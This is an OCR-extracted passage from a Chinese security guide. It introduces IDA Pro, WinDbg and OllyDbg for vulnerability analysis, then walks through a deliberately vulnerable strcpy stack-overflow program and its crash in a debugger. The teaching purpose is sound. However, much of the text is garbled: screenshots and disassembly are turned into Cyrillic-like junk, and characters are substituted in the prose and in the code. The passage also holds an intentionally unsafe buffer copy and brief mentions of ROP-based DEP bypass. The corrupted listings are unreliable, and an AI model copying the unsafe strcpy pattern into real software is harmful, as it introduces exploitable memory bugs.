在 完成 一 次 完整 的 漏洞 分 析 和 利用 之 前 ， 还 需要 了 解 使 用 哪些 工具 可 以 完成 这 个 过 
程 。 其 实 网 上 对 于 漏洞 分 析 、 利 用 的 工具 很 多 ， 包 括 很 多 大 牛 也 做 出 过 用 来 fozz 的 工具 ， 
以 及 很 多 能 挂 载 在 OD、IDA 上 的 插件 。 当 然 ， 对 于 漏洞 分 析 还 需要 重点 了 解 三 个 “和 神 
器 ”， 这 三 个 神器 可 以 说 是 漏洞 分 析 的 主体 ， 如 果 对 这 三 个 工具 了 如 指 掌 的 话 ， 对 于 现 如 
今 99% 的 软件 漏洞 都 能 拨 开 其 面纱 ， 了 解 其 本 质 。 

在 笔者 为 大 家 分 享 漏洞 分 析 过 程 之 前 ， 在 此 对 这 三 种 工具 做 简单 说 明 ， 当 我 们 了 解 了 
这 三 种 工具 的 使 用 及 分 析 方 法 之 后 ， 就 是 万 事 俱 备 ， 只 从 东风 了 ! 

以 下 内 容 适合 对 IDA Pro、WinDbg 以 及 OllyDbg 不 了 解 的 初学 者 学 习 ， 对 这 三 种 工具 
了 解 或 者 精通 的 读者 可 以 略 过 以 下 内 容 。 有 些 工具 在 下 一 章 也 会 介绍 ， 但 是 侧重 点 不 尽 相 
同 ， 读 者 可 互补 学 习 。 


1. IDA Pro 


ША Pro 是 静态 反 汇编 的 神器 ， 无 论 在 Windows 还 是 Linux 系 统 下 都 有 不 凡 的 表现 。 随 
ЖША Pro 的 更 新 ， 它 现在 也 开始 文 持 动 态 调 试 ， 其 强大 的 反 汇 编 能 力 不 仅 能 将 PE 文件 的 
文件 格式 分 析 得 一 清二 楚 ， 而 且 可 以 将 选择 的 代码 段 反 汇编 成 伪 代 码 的 形式 ， 大 大 纵 短 了 
分 析 枯 燥 的 汇编 代码 的 时 间 。 它 不 仅 能 够 在 Windows 下 完成 文件 的 分 析 ， 同 时 在 令 人 烦恼 
的 Linux 系 统 下 仍旧 可 以 完成 文件 的 分 析 。Linux 下 和 冀 见 的 反 汇 编 方 式 束 是 使 用 GDB， 但 是 
GDB 也 是 在 命令 行 下 使 用 ， 而 且 绝 大 部 分 溢出 需要 -core 的 支持 ， 其 烦琐 程度 令 人 恼火 ， 
但 是 IDA Pro 的 Remote Linux Debugger 功 能 非常 强大 ， 可 以 支持 远程 调试 Linux 下 的 软 
件 ， 这 将 大 大 减少 烦琐 的 命令 行 操作 ， 令 Linux 下 的 软件 ， 进 程 调试 变 得 和 Windows 下 一 
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样 简单 。 

下 面 笔 者 将 针对 IDA Pro 进 行 一 些 入 门 级 的 介绍 ， 描 述 在 进行 漏洞 分 析 过 程 中 需要 的 
一 些 主要 功能 ， 其 实 IDA Pro 本 身 的 功能 非常 强大 ， 其 余 的 功能 需要 读者 慢 慢 学 习 。 

ША Pro 的 主 界面 如 图 8-1 所 示 ， 界 面 上 方 是 沫 单 栏 ， 其 中 包含 了 IDA 的 所 有 工具 ， 磊 
侧 是 函数 栏 ， 右 侧 是 主 窗 口 ， 下 方 是 输出 栏 。 左 侧 的 函数 栏 在 没有 导入 Windows 的 符号 
表 的 时 候 ， 会 将 函数 以 “sub 数字 ”的 形式 表现 ， 其 实 它 代表 着 一 些 函 数 的 定义 ， 比 如 
printf、strcpy 等 ， 当 符号 表 导 入 之 后 ， 这 里 就 会 显示 出 真正 的 函数 值 了 。 


су IDÀ - C:\Program Files\ [DE Computer Solutions\UltraEdit“Uedit32. exe 


File Edii Jump Search View Debugger Dptions Windowns Help 

|a| - > ТТІ v| £ || = х 

|a e|ë m КЕТЕД ЕЛЕК ГЕЙ Ҹа 8 | в 
ае вв TE E= во SHK- # |: се ци |ВАТАЖ 


anelsen] ЕКА | h H Шеела | 


+ — Window ох | x 国 IDAViewa | x 图 Hesvewa | x В Sractacs | x En Егите | x НЕ Impors | x В Гро | 


Function пате Ftezt:808C73612 ; [BB808008Bñ BYTES: COLLAPSED FUNCTION start. PRESS KEYPAD "+" TO EXPAND] A| 
Ха ав 407190 -text:8007361C 
У оь 407160 Техт ` 80623618 > =============== S U B R Ú ИТ 1 N Е =g=w====================================== 
МА аЬ 4071380 -text: 98967361С 
заь 401200 „сех; 9967361С 
Ма аЬ 4013ғ0 -text: ийс7361С сив С7361С ркос near ; CODE XREF: <и С23719+114р 
ЗА а 401500 * „ех: 9607261С тоу edi, edi 
xa ub 401570 * „Бех: 00С2361Е риѕћ езі 
“Аа nin * -text:9nc7361F call <ш! C74B36 
Жы бп * „ох: 98С7362н рор ecx 
о. “ „Бех: 090073625 стр eax, 5 
` т s 4 
Яс 101800 ` -text:p6C73628 jn loc_C736B6 
МА а 401040 * „text:00C7362E mouzx вах, word ptr [esi] 
E} зов 4010180 * „Тех: 908673631 спр eax, 5Ch 
МА sb 4010Е0 ` „Техг: 9973638 jz short loc_G7363B 
А sb_4021ED ” .ЖехЕ:00С/3636 cmp eax, 2Fh 
ЗА ль 402170 * „Техт: 00073639 jnz short loc 673606 
МА 45402220 „бех: 99673638 
Я sub 402200 ，) „tegt:00C7363B lot С7363В: ; CODE XREF: sub_ 73614187 
а x< 
Хал 402400 | `>% ехе: 090673638 поугх eax, word ptr Гесі» 21 
ЗА аЬ 402650 * -text В0Сғ303Ғ стр eax, 5Сһ 
YA sub 402680 * „техт:иистзац? jz short 10с С7З6ц9 
“ при * -text2:960C7360HN с eax, 2Fh 
А а 102710 ер 
Сі + „Бех: 00073647 ілг short loc 673666 
” а 
k: ры _техЕ : пстзбио 
| а 102990 i 
эд ub 402400 -text:00C73ő649 loc C73649: ; CODE XREF: сив С73610+261) 
Ë о. < „Сехт: 99673649 поугх еах, ит ptr Гез1:41 
Некелік ` Тех: 99673640 стр вах, 
Па 402840 - ¿text:00C73650 12 short _6736В6 
Уй аһ 402070 * „Тех: 00673652 стр eax, 2Fh 
ЗА а 402Е00 ` техг:00с73655 jz short 10с 673686 
МА 1 402Е20 ` „Сехт: 8073657 Теа eax, [esi+6] 
ЗА за 402ЕБ0 5 „Техг: 90062365Й почгх ecx, word ptr [eax] 
图 | Т! | | < „ЕехЕ: 99073650 xor edx, edx М 
- 002872412 00С73612: start 
Е Ори windaw — —— s = Е чес кк и ашк чы одаи оса 
License: ВВ-ЕЕОЕ-С244-00 11 censed user (1000 users). А 
The һоїКеуз аге Р decomile Ее1- сотрі1с 211 А 
1 спе И 532 з Жі. info = п 


524000; 0103; Сап; с find пале при use manual аа 
529000: 0102: Can't find маме (hi 


55 000: 0103; Can't find пале (hint; изе manual ar 3 
пайт па ТОР module C:\Program ғіігзқтПачрғасварс -м 32... 


bytes. pager rize description 一 | 
51062564 2592 8192 ál loc cating memory for b-t 
59061564 65 Ë 8192 аттас cating memory НА легия” „аггау. 

IDO 

АС:005СЕ503 | Doan | Disk: 3168) 


8-1 IDA Pro 主 界面 

界面 右 侧 是 反 汇 编 的 主 窗口 ， 在 IDA View-A 菜 单 中 会 包含 反 汇编 的 结果 ， 其 中 .text 代 
表 看 PE 文件 中 的 字段 ， 后 面 的 8 个 学 节 是 汇编 语言 所 在 的 内 存 地 址 。 

当选 中 茶 段 汇编 语言 后 ， 按 FS 键 会 将 该 段 汇 编 语 言 反 编译 成 伪 代 码 的 形式 ， 这 样 使 逆 
回调 试 变 得 更 为 简单 ， 更 容易 分 析出 漏洞 的 形成 原因 ， 如 图 8-2 所 示 。 

在 对 PE 文件 进行 加 载 并 用 IDA Pro 完 成 分 析 之 后 ， 它 会 将 该 程序 的 代码 结构 以 流程 
图 的 形式 展现 出 来 ， 如 图 8-3 所 示 。 这 人 不仅 方 便 我 们 观察 每 个 模块 之 间 的 关联 与 跳 转 等 头 
系 ， 同 时 再 对 补丁 进行 比较 分 析 ， 从 而 快速 定位 漏洞 位 置 时 也 起 到 了 很 大 作用 。 
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lb "ает А ГЕТА. ТЫ 80 АГА ЕЩ... Жалыны Eki. ГР ЧЫН 
Е Е ығға. | Ed күр №, ВИ 


те: 
7 = 
тъ та паг Er üm PT 

тш яш Pe Bi ihm шы пи um та та 
тыға В Ак Àk um шаға ті тен и шы ше зи га 
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ы е. 11-І. на ЕНЕННЕНЕ 
иын ез Но шак нн шанлы т 
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к, И лат Дата и геа в Ба а. Em бег 
шылт Бар Б. Ба ра: [Би а шалы Ва ы ве mm б 
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тини ий, ша из | Ë WP II ë Pis ср аи A та 
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3 Wha 


пита BONE А | Жаы. 
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Copyright (с) Microsoft Corporation. 


ххх vait vith pending attach 
Symbol search path is: 


А11 rights reserve 


*** Invalid жжж 


ЗЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЗЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЗЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ -ЗЕ ЭЕ ЭЕ ЭЕ ЭЕ ЗЕ Э ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЗЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЭЕ ЗЕ ЭЕ ЗЕ M 
ж Symbol loading may Бе unreliable without а symbol sez 
ж Use .synfix to һауе the debugger choose a symbol patt 


ж After setting your symbol path, 


use .геісай to refres 


ЗЕ ЗЕ ЗЕ 36 36 36 36 ЗЕ З ЭЭЖ 36 £ 3£ 36 3£ ЗЕ ЗЕ Ж ЗЕ 36 36 £ 3£ ЗЕ 3£ E Э 36 36 36 Э ЗЄ ЭЄ ЗЕ ККК Ж 36 36 ЭЄ Э Ж DE Ж 36 £ ЭЄ ЭЄ ЗЕ ЭЄ М 
Executable search 


Medload: 
ModLoad: 
МоаГоаа: 
МоаТоаа: 
Medload: 
МоаТоаа: 
ModLoad : 
HodLoad : 
ModLoad : 
МоаГоаа: 
МоаТоаа: 
МоаТоаа: 
МоТоаа: 
МоаТоаа: 
МоаТоаа: 
МоаГоаа: 
ModLload : 
HodLoad : 
МоаТоаа: 
МоаТоаа: 
HodLoad : 
МоаТоаа: 
ModLoad : 
HodLoad : 
HodLoad : 
МоаТоаа: 
(52с.5с8): 


с==001Ь 


01000000 
7с920000 
7с800000 
79590000 
77220000 
77е50000 
77Ес0000 
??е 0000 
77410000 
77Ье0000 
77Ғ40000 
5сс30000 
5850000 
76610000 
76990000 
770£0000 
?7bb0000 
77bd0000 
759420000 
байс0000 
76300000 
62620000 
73Еа0000 
77180000 
74680000 
73640000 


path is: 
0101#000 
?с9Ь3000 
7с91е000 
74984000 
77249000 
77ее2000 
77Ғ4а1000 
77Е39000 
77?4а0000 
77с38000 
77ЕЬ6000 
5сс56000 
591 7а000 
76b3a000 
76acd000 
7717b000 
??bc5000 
77Ба8000 
75а7Е000 
Sadf 7000 
76314000 
6229000 
74005000 
77283000 
746сс000 
7366е000 


сопс0О0ОП00ОПОП0100О0ПОПО0П0О00ООО 


“ИТ НООНО у= ен 32 са! с.е 
:\“WMINDOWMS system32\ntdl1l. 


:\“WMINDOWMS system32\GDI32. 
:NWINDOUSN=sysgstem32SNsUSER3¿ 


:SWIHDOUSNFAppFatchsšsà4icGenz 
:SNSWINDOUSN=gystem32SUIHMM. 
:S5SWINDOWSN=gysgtem32socle32. 
:\NWINDOWSNsystem3 2 NOLEAUT 
:\NINDOWSNsystem3 2 УМСЗАСИ: 


:NWINDOUSNsystem32SIMM32. 
:S5SWINDOUWSN=system32sLPE.DI 
:SNSWINDOWSNsSys=gtem32SsUSFP10. 
:S5sWINDOUSNWUinSzS"z86_Micr 
:\“WMINDOWS\system32\MSCTE. 
:\“WINDOWS\system32\msctf1 


Вгеак instruction exception - code 80000003 
eax=7ffd8000 ebx=00000001 есх=00000002 еах-00000003 езі 
езр-7с92120е esp=00abffcc ebp=00abftff4 10р1=0 г 


ntdll ! ПБаВгеакРо:тп!: 


===0023 ds=0023 е==0023 
*** ERROR: Symbol file could пої Бе found. 


#==0038 gs=0000 
Defaulted t 


7с92120е сс int 3 

图 8-7 Windbg 命 令 行 

下 面 介 绍 调试 过 程 中 几 个 主要 的 命令 。 

> kb 一 一 查看 堆栈 调用 ， 通 过 输入 kb 可 以 查看 进入 函数 前 都 调用 了 哪些 函数 ， 从 而 快 
速 回溯 还 原 漏 洞 触发 前 的 场景 ， 有 助 于 快速 定位 漏洞 触发 的 位 置 ， 如 图 8-8 所 示 。 


0:001> kb 


СЪ119ЕВР FRetAddr Агаз іс Child 


VARNING: Stack unwind information not available. Foll 
ОПаБЕЕ #4 00000000 00000000 00000008 00006050 ntd311!1Dk 


图 8-8 Windbg kb 命令 


> bp，ba 一 一 下 断 点 ， 其 中 bp 可 以 对 指定 地 址 下 断 点 ; ba 可 以 对 函数 写 入 断 点 ， 执 
行 断 点 。 写 入 断 点 是 指 如 果 在 指定 内 存 区 域 有 新 的 数据 写 入 时 ， 则 触发 断 点 ， 


执行 断 点 是 指 当 该 内 存 区 域 的 内 容 被 执行 时 则 触发 断 点 ， 同 时 bc 可 以 用 来 删除 断 
点 。 也 可 以 通过 bp FFFFFFFF "if(poi(@eax) 一 ).elsefg; }" 的 方式 来 下 条 件 断 点 ， 
该 条 件 断 点 是 指 在 FFFFFFFF 地 址 处 如 果 eax 等 于 某 值 时 暂停 ， 否 则 继续 。 

> dd esp 一 一 查看 某 寄 存 器 内 容 ， 实 例 使 用 的 是 esp 寄 存 器 ， 这 里 可 以 改 eax、ebx 等 ， 
这 里 方便 对 寄存 器 的 跟踪 ， 可 以 很 好 地 分 析 在 漏洞 触发 时 寄存 器 的 变化 状况 等 ， 
如 图 8-9 所 示 。 

> !heap-p-a 一 一 打开 页 堆 央 常 检 测 ， 其 主要 功能 是 在 堆 空间 ， 如 果 此 时 页 堆 发 生 央 常 
则 显示 ， 这 是 对 很 多 堆 溢出 漏洞 调试 非常 实用 的 工具 。 
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АЧ4аге== expression missing from '<ЕОГ»' 
0:001> dd esp 
25970010 00000005 00000004 00000001 
ООзЬЕЕЯО 0001аа3Ъ ЕЕЕЕЕЕЕЕ 7с92е900 
25970030 00000000 00000000 00000000 
00000000 00000008 00006050 00000000 


ЕЕЕЕЕЕЕЕ 00004000 00000001 00000000 
00000000 00000000 00000000 00000560 
00002050 28с7:140 11424е25 1000ddafť 
00ас003с Һ599275а 0000000а 00000001 00000000 


图 8-9 Windbg dd 命令 
以 上 命令 是 在 漏洞 分 析 时 常用 的 命令 ， 通 过 对 这 些 命 令 的 理解 ， 可 以 很 好 地 看 到 寄存 
器 的 变化 ， 定 位 汇编 代码 ， 再 通过 对 汇编 代码 的 回溯 分 析 ， 找 到 漏洞 的 触发 点 以 及 形成 


3. OllyDbg 


OllyDbg 是 对 于 刚 入 门 者 最 推荐 的 动态 调试 工具 ， 它 的 界面 相 比 WinDbg 来 说 非常 友 
好 ， 而 且 对 于 堆栈 状态 的 展示 非常 清晰 。 如 果 说 OllyDbg 是 一 个 界面 的 话 ，WinDbg 就 像 命 
令 行 一 样 ， 同 时 OllyDbg 同 样 支持 二 次 开发 ， 有 很 多 人 将 自己 的 插件 放 在 OllyDbg 里 辅助 
反 汇编 ， 往 往 可 以 事半功倍 。 同 时 OllyDbg 本 身 也 自 带 一 些 非常 好 用 的 插件 ， 比 如 Disable 
DEP， 这 对 于 构造 ROP 链 绕 过 DEP 来 说 会 起 到 很 大 作用 ， 它 能 迅速 帮助 使 用 者 定位 到 构造 
ROP 链 所 需 的 地 址 位 置 。 请 大 家 自己 动手 操作 ， 下 载 OD 工具 并 打开 。 可 以 看 到 在 界面 的 
左上 角 是 反 汇 编 的 主 窗口 ， 右 上 和 角 是 寄存 器 窗口 ， 左 下 角 是 内 存 窗口 ， 右 下 角 是 堆栈 调 
用 窗口 (参考 图 9-1) 。 相 比 WinDbg，OllyDbg 的 界面 操作 起 来 更 直观 ， 可 以 通过 调试 界 
面 ， 选 择 对 程序 单 步调 试 或 者 直接 执行 等 操作 ， 通 过 右 侧 可 以 直接 观察 到 寄存 器 的 变化 情 
况 ， 如 果 标 红 ， 表 示 在 这 一 汇编 代码 结束 后 会 影响 到 该 寄存 器 存放 的 值 ， 这 更 加 有 利于 对 
漏洞 的 回溯 工作 。 

在 菜单 栏 中 可 以 看 到 L、E、M、W 等 按钮 ， 这 些 按钮 代表 OllyDbg 的 其 他 几 个 窗口 ， 
通过 其 他 几 个 窗口 中 的 内 容 可 以 辅助 我 们 进行 反 汇编 调 试 。 

其 中 窗口 表示 堆栈 调用 的 查看 ， 功 能 与 WinDbg 里 的 K 相 同 ， 可 以 查看 该 汇编 代码 前 
的 函数 调用 情况 ， 帮 助 我 们 回溯 汇编 代码 执行 的 流程 〈 见 图 8-10) 。 

кв: read 


Stack ЖЕ с ЈС АЛАНА 

0087ҒЕ00 01002180 77? са1с.010021йЕ 

990772720 010125Е9 | са1с.01001Е51 calc.<ModuleEntruPoint>+16F 
0007FFCN 70817067 277? Кегпе132 7817964 


图 8-10 ”OllyDbg 堆 栈 调用 窗口 
E 窗 口 表示 可 执行 模块 ， 其 中 可 查看 该 程序 执行 时 调用 的 模块 名 称 、 地 址 等 ， 这 在 构 
造 ROP 链 、ASLR 绕 过 方式 等 方面 都 会 起 很 大 的 作用 〈( 见 图 8-11》。 


— 145 — 


АА 黑客 与 安全 技术 指南 


Е 可 执行 模块 [= ах 
Base ( 列 大 小 ЕН Ж | 类 型 ” | 
01000000 999127999! 919124575 | calc 

58SFB0000 881С4088 58Е0696Е | Ясбепка1 

5ñDC00800 0800370080 5ADC1626 | UxTheme 

5СсСс380808 80808260888 5ССЗ8Е55 ShimEng 

62628888 00009000 62С22Е80 | РК 

73648888 ВОВЕ ВВВ 73659ЕЕ1 msctfime іпе 

Z#3Fñ08000 99068099 73ҒВЕЗ9 USP18 

7688088 999409981 74681315 МЅСТЕ 

75900000 ВОВЕ ОВО 759015ЕН ІЗЕБЕНІ) 

763808008 880100808! 763812С8 ІННЗ2 

76998000 00130 000 76910689 о01е32 

76810000 80802408088 76В12В61 WIHHH 

7709Ғ ВВВВ 80808В0808 гг 8Е 15608 01 ЕЙВЦТЗ2 

77180000 801030888 77184256 comct132 

7?ВВ8888 80881520808 77ВВ1292 HSñCH32 


??топяйаай! апппоппа! 770па лос | СОСТАЫ 


^ 
-1.2608.8 (хрс! ADUAPI32, 60132, КЕННЕІ 32, msucrt 
-1.2688.5512 (2 ADUAPI32, 60132, КЕВНЕІ 32, МЗАСМЗ: 
-88.2900.5512 (ADUAPI32, 60132, КЕННЕІ 32, msucrt 
-1.2680.5512 (2 КЕВНЕІ 32, пЕй11 
-1.2680.5512 (160132, KERNEL32, ntdll, USER32, U: 
-1.2680.5512 (2 ADUAPI32, 60132, IMM32, КЕВНЕІ 32, 
-0420.2600.5517 ADUAPI32, 60132, КЕНВНЕІ 32, USER32 
-1.2688.5512 (iñDUñPI32, 60132, КЕНВНЕІ 32, msucrt 一 
-1.2680.5512 (2 АрУЯРІЗ2, КЕВНЕІ 32, msucrt, ntdll 
-1.2688.5512 (iñDUñPI32, 60132, КЕНВНЕІ 32, пЕй11, 
-1.2680.5512 (2 АрУЯРІЗ2, 60132, КЕННЕІ 32, msucrt 
-1.2608.5512 (3 ADUAPI32, 60132, КЕКМЕ! 32, пЕй11, 
-1.2680.5512 ñDUñPI32, 60132, КЕННЕТ 32, msucrt 
-8 (хрср.08051: АрУЯРІЗ2, 60132, КЕННЕІ 32, msucrt 
-1.2680.5512 (2 ЯОЦЯРТЗ2, 60132, КЕННЕІ 32, msucrt 
v 


[ 8-11 olyDbg 可 执行 模块 窗口 。 еле 
M 窗 口 是 内 存 映 射 的 情况 ， 这 里 可 以 看 到 每 个 模块 的 地 址 、 访 问 权 限 等 ， 比 如 通过 E 
窗口 找到 想 要 构造 ROP 链 调用 地 址 的 模块 ， 通 过 分 析 它 的 读 取 权限 来 决定 是 否 使 用 该 模块 
中 的 地 址 ， 或 布置 shellcode 位 置 的 选择 等 〈 见 图 8-12) 。 
ша 


00010000 00001000 
00020000 00001000 


ІШ 


пм с мл мл мл мл м a мл м ле мл 
-=h =h =h -. -4 -ь 


00030000 00008000 в Рғіу | RW 

8087C080 888081080 Рғіу | RW 

88970000 80803080 NS of main threa Priu RW 

0008808080 0080803080 Мар |R 

80898080 00002000 Map |R 

OOHAHOOO| 90017000 Bi 人 Priu| RW 

80140000 00006000 n Priu RW 

001B0000 00003000 A Нар RW 

801C00080 00016000 Map |R C:\WINDOWS\system32\unicode .nls 
001Е 0000 00041000 Нар |R С:\ 4140045 \5у5Гет32\1оса1е .п15 
00230000 00051000 Мар |R C:\WINDOWS\system32\sortkey.nls 
00280000 00006000 Нар |R C:\WINDOWS\system32\sorttbls.nls 
80298080 0880851080 Нар |R 

002Е 8080 0080803080 Нар ВЕ 

803480000 00002000 Нар ВЕ 

90380000 00001000 Priu RW 

003C0000 00001000 Priu RW 

003D0000 00006000 A Priu RW 

003Е 8000 00002000 Мар В 

803F8080 00001000 Мар RW 

80588080 00002000 Мар |R 

00510000 00008000 в Priu RW 

88528080 88805080 HB Priu| RW 


895300080 0080803080 Map |R 


ЖІ8-12 OlyDbgň FANO 

OllyDbg 之 所 以 作为 入 门 级 调试 工具 ， 就 在 于 其 简单 易 懂 的 界面 ， 可 以 通过 堆 窗 口 、 
栈 窗口 以 及 寄存 器 窗口 很 直观 地 观察 到 程序 执行 及 漏洞 触发 过 程 中 堆栈 空间 的 内 存 变 化 情 
况 ， 甚 至 可 以 观察 到 当 漏 洞 触 发 时 构造 的 畸形 字符 串 履 盖 栈 空间 及 导致 恶意 代码 执行 的 整 
个 过 程 ， 相 比 OllyDbg、WinDbg 就 需要 更 多 的 命令 来 查看 这 一 过 程 。 

因此 ， 对 于 OllyDbg 的 掌握 有 助 于 初学 者 对 于 漏洞 分 析 的 快速 入 门 ，OllyDbg 同 样 提供 
了 很 多 的 插件 ， 这 里 就 不 一 一 讲解 ， 在 今后 的 学 习 过 程 中 ， 会 逐渐 了 解 到 OD 的 插件 是 如 
何 辅 助 调试 的 。 


C:\WINDOWS\system32\ctype .nls 


8.1.3 strcpy 引 发 的 “血案 ” 


首先 笔者 编写 了 一 个 有 漏洞 的 程序 ， 程 序 中 关键 点 在 于 strcpy 函 数 ， 这 也 是 目前 很 多 栈 
洲 出 漏洞 的 根本 原因 ， 大 多 数 都 是 因为 对 于 数组 边界 检查 不 够 严格 造成 的 〈 见 图 8-13〉。 
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int flag = 9; 
char overflow а|188|-"аааааааааааааааааааааааааааааааааааа” 


图 8-13” 超 长 字符 串 定义 
可 以 看 到 给 overflow_a 赋 值 为 一 个 超 长 学 符 串 ， 这 就 是 触发 漏洞 的 超 长 字符 串 ， 这 也 
方便 后 期 笔者 在 构造 利用 shellcode 时 候 修改 。 
图 8-14 所 示 是 一 段 笔者 触发 漏洞 的 关键 代码 ，strcmp 并 不 是 关键 ， 只 是 之 前 笔者 做 密 
码 绕 过 的 实验 时 使 用 的 ， 这 个 漏洞 的 关键 点 是 下 面 的 strcpy， 可 以 看 到 上 面 构造 的 数组 大 
小 为 8， 而 定义 的 overflow_a 数 组 大 小 为 元素 的 个 数 ， 那 么 当 笔 者 以 超 长 串 拷贝 到 b 数 组 
中 的 时 候 ， 会 造成 多 出 来 的 a 元 素 履 盖 到 栈 中 b 数 组 下 面 的 内 容 ， 造 成 栈 被 破坏 ， 从 而 产 


char b[8]; 

i =strcmp(overflow a,overflow b); 
strcpy(tb,overflow а); 

return 1; 


图 8-14 ”漏洞 触发 关键 代码 
挂 载 WinDbg， 执 行 如 下 程序 。 
可 以 看 到 程序 月 汗 了 ，WinDbg 弹 了 出 来 ， 而 目前 指 回 的 地 址 是 61616161， 也 就 是 a 的 
ASCII 码 〈 十 六 进 制 情况 下 ) ， 这 是 一 片 无 效 的 内 存 空 间 ， 直 白地 说 程序 无 法 读 取 这 段 内 
存 空间 中 的 汇编 语言 继续 执行 程序 ， 导 致 了 程序 崩 尝 ， 如 图 8-15 所 示 。 


(604. 1а8): ` access violat tion - “code 20000005 ШЕ second | chance ІІ 
вах=61616161 ebx=7ffdf000 есх=0012##40 ейх=00000000 esi=0042205d edi= BUSSES 
eip=61616161 esp=0012fec8 ebp=61616161 iopl=0 ny up ei pl zr па pe 
с==001Ь ss=0023 ds=0023 es=0023 fs -003b gs=0000 её] = 00000246 
61616161 ?? ??? 


8-15 “程序 崩溃 现场 
当然 如 果 笔 者 要 利用 的 话 ， 会 将 特定 的 shellcode 覆 盖 在 特定 的 空间 使 程序 执行 ， 这 在 
Windows XP 系统 下 是 成 立 的 ， 但 是 目前 大 多 数 系 统 都 会 开启 DEP、ASLR 这 些 内 存 执行 保 
护 、 地 址 随机 化 等 保护 措施 ， 当 然 现 在 的 黑 帽 子 们 也 提供 了 各 种 绕 过 方法 ， 比 如 构造 ROP 
链 、 利 用 虚 表 指针 等 方式 。 
这 里 不 袭 述 。 下 面 来 看 看 栈 中 的 情况 ， 如 图 8-16 所 示 。 


0:000> 99 езр 


0012Е ес 
0012Ееа8 
0012 ее 
0012ЕеЕ8 
00121105 
00121118 


61516161 
сссссс00 
CCCCECCC 
CCCCCCCC 
сесесесс 
61616161 


61616161 
сссссссс 
сссссссс 
сесовесе 
сс 
61616161 


61616161 
сссссссс 
сссссссс 
сеесессс 
сссссссс 
61616161 


61616161 
Gocot 
сссссссс 
сссссесе 
и ты чыш ты ты в. 
61616161 


О012ЕЕ2В 
0012ЕЕ38 


61616161 61616161 61616161 61616161 
61616161 00000000 00000000 00000000 


图 8-16 ”程序 崩溃 时 栈 中 情况 
通过 图 8-16 和 图 8-15 可 以 看 到 EBP， 也 就 是 栈 底 已 被 修改 成 61616161， 而 假设 当 
初 为 栈 开 尽 的 是 30h 的 大 小 ， 那 么 此 时 的 大 小 是 ebp-esp〔〈 栈 底 - 栈 顶 ) 48% л:61616161- 
0012fec8， 换 句 话说 已 经 破坏 了 栈 平 衡 ， 这 个 栈 也 被 破坏 了 。 
下 面 ， 笔 者 将 以 正 向 调试 的 角度 来 为 大 家 还 原 整个 漏洞 触发 的 过 程 ， 这 在 真正 的 漏洞 
调试 中 也 是 分 析 漏 洞 形 成 原因 以 及 利用 方法 的 最 后 一 步 ， 笔 者 为 大 家 跳 过 的 是 之 前 逆 癌 回 
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漳 的 整个 过 程 ， 而 这 个 只 有 数 十 行 汇编 代码 的 程序 也 将 略 去 利用 “! heap-p-a” Ла ИЖ 
Ы НУ о 

首先 改 用 OllyDbg 工 具 ， 执 行程 序 并 且 在 程序 main 图 数 的 入 口 点 断 住 〈 见 图 8-17) ， 
假设 这 就 是 一 个 复杂 的 漏洞 程序 还 原 到 触发 点 之 前 的 两 个 函数 。 


00101 ӨВй ВЕ 38204200 mou esi,offset 090422838 ASCII "аааааааааааааааааааааааааааааааааааа" 
. 8070 98 Теа ейі ,[ебр-68] 
. ЕЗ:А5 rep mous dword ptr [edi],dword ptr [esi] 


. ñ" mous bute ptr [edi],bute ptr [esi] 
. B9 97999900 mou есх, „ВЕ 
33С0 


. xor eax,eax 
. 8070 BD Теа edi,[ebp-43 
. ЕЗ:АВ гер stos dword ptr [edi] 
- 66:АВ stos word ptr [edi] 
. stos byte ptr [edi] 
вв 01000000 поч eax,1 
85C Ü test eax,eax 
jz short 8001112 
lea ecx,[ebp-68] 
- 51 push ecx 
е ЕВ ЗЕРЕЕЕЕЕ call 00801005 
. 8305 04 айа езр,4 
- 8945 ЕС mou dword ptr Геһр-81|,еах 
. 8370 ЕС 00 cmp dword ptr [ebp-4],0 
. в ВЕ је short 805081101 
. 68 30205200 | push offset 00422030 ASCII “noti” 
. ЕВ 140208000 | call printf Cprintf 
add esp," 
jmp short 0049011190 
00101101 › 68 28204200 push offset 00422 028 ASCII "oktm'' 


图 8-17 程序 反 汇编 定位 
略 去 main 函 数 入 口 处 对 于 栈 的 一 系列 操作 ， 在 最 项 上 的 函数 可 以 看 到 将 偏 移 尾 
00422038 处 保存 的 ASCII 码 存 入 ESI， 其 实 当 使 用 OllyDbg 时 可 以 在 栈 内 看 到 将 这 一 串 a 推 入 
栈 中 的 过 程 ， 而 黄色 标记 的 一 行 中 的 call 正 是 漏洞 触发 的 关键 函数 ， 相 当 于 触发 漏洞 的 最 
后 一 层 函 数 ， 那 么 在 这 个 函数 下 断 点 跟 进 看 一 看 〈 见 图 8-18) 。 
. 83EC НС sub евр, #6 


00401026 |. 53 push ebx 
56 push есі 
5? push edi 
8070 B4 Теа ейі „Гевр-с | 
B9 139999989 | mou есх,13 
B8 СССССССС mou eax,CCCCCCCC 
ЕЗ :АВ кер stos dword ptr [еді] 
68 16284288 |push offset 00322601С ASCII "1235567" 
mou eax,duord ptr [ebp+8] 


push еах 


са11 strcmp [strcmp 
add езр,8 

тоу dword ptr [ebp-4],eax 

mou есх :dword ptr [ebp+8] 

push есх 

Теа edx,[ebp-erc] 


E8 Ғ/ 000080 
8305 08 
8B45 ЕС 


图 8-18 程序 反 汇编 定位 

可 以 看 到 ，strcpy 函 数 此 时 push 了 ecx 及 edx，ecx 赋 值 是 ebp+8， 也 就 是 该 函数 的 第 一 个 
参数 ， 就 是 上 面 传 入 的 aaaaaaaaaaaaaaa， 那 么 下 面 edx 就 应 该 是 我 们 的 b8 数 组 了 ， 这 样 可 
以 直接 让 程序 执行 多 次 后 ， 发 现 strcpy 函 数 内 部 的 内 容 ， 其 实 就 是 将 超 长 字符 串 以 4 个 字 节 
( 即 4 个 a 为 一 段 ) 为 一 个 单位 复制 到 寄存 器 ， 那 么 在 栈 溢出 发 生 的 最 后 一 个 调用 ， 可 以 看 
到 此 时 ebp 的 值 是 0012FEC0， 而 当 以 超 长 串 复制 到 寄存 器 后 ， 可 以 看 到 ebp 的 值 被 修改 成 
